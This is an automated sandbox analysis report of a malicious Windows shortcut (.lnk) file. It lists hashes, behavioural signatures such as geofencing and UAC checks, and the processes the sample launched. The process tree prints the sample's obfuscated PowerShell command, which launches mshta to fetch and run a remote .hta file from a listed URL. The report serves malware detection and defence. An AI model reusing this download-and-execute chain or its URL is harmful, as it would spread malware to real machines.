Analysis
-
max time kernel
140s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
23-05-2024 01:58
General
-
Target
bb26c65d29da78c698c19344058832b21593d27f4d89b5118345bb76614a564a.lnk
-
Size
1KB
-
MD5
60f1320faf25bc20101c4312f82a72f8
-
SHA1
a37a8f932db503eed34cbe9aa1db40f63b36fee1
-
SHA256
bb26c65d29da78c698c19344058832b21593d27f4d89b5118345bb76614a564a
-
SHA512
96652e9e0a96545449a260c19d920eb3f1debc879e76f5a594848a28ef165b733ca61fcc75636781289e30cc7e87aae11028ff159a1bdc93a274dbed99f03d07
Malware Config
Extracted
https://foundationforwomenshealth.com/rooming.hta
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 37 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\bb26c65d29da78c698c19344058832b21593d27f4d89b5118345bb76614a564a.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://foundationforwomenshealth.com/rooming.hta'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://foundationforwomenshealth.com/rooming.hta3⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5824 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5824 CREDAT:17412 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3100 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
503B
MD54ca3c20cf0350948d78034ae05f7214a
SHA17e22661b0cfff067f0214fd592146dd7e235e6af
SHA256310d57e27b68292969aad3acad17d241e9f6dd7d0d289cea4d501dc73a0309f7
SHA5123d3a5534bc16b1796a4b9656369b0511283501d3474f7ede8b1249f7064ba10f012f6143b1d51776c54abb83a1a09c6b0cd1c0be4f6e1a1a3f51d251cf9c52f8
-
Filesize
471B
MD501409a92b179c99711ea8c28d307d0c4
SHA1a9cc2b0c5727e2af14819f3908c4693f8e891392
SHA2563034962a4c308ef5e66a2de7faf1ed2439b7e59086a8c07ad59ce3669b8ee01c
SHA5128e86173a54d253f3e05443c603222b9018d63a3fb8e3a26b2b5602c083c07b117d5c53ede08056b6aa4503380562444c6704de32b2cce76f146478616b7278c9
-
Filesize
192B
MD55ab979d86f1ab7b3c8776c0dc2bfe834
SHA1fad24cbcf711ee12d95ba76ceb8b19ebfe9a563e
SHA25606d0d5280d9eb08b0f1d78e898a073b01d8a17c21dbacc5bd9a2f4ce5c4d4721
SHA512c9aa1c6e4f4930b5afb0db71178ae69afb7d93383be9e18a426f2e1d105da72742c3f648b14ba653b02d65fd6911790af577fc88f320d0ec4476f495950dda9d
-
Filesize
552B
MD54547157396e6f74da2dde1c7412ecf82
SHA138db6fbe301f529da5ccd69476ba84d2883a60f4
SHA2562ffb3d81f127fa58f8c491d931c5bca33acd761773ca1098588f3e8e952d4eed
SHA512c9ed2f620714fdcde15b469f6e8387f14e917d36fbaf5769b2ded3a4b7491373f77b30f5a1e54a33de183961ebb4fb3de0062d65b2916cc52dd20afb6c5044d5
-
Filesize
404B
MD51fad7e6ca1446ea4a8267d3d2f43d420
SHA16bdfdf4881a589a38306b3d656387fedb6da8616
SHA256856f56cb600fde1c97142ed73609992004d92a7b601244658383f9d94609ce40
SHA5120f8956dc9d95e74bd9eb522463318487e94f8ee900bc3affe4096856c2479ef139f33213e240fd93e26bac6dea81db4fe8b9456e69e6cc69394e5b24bc339acb
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB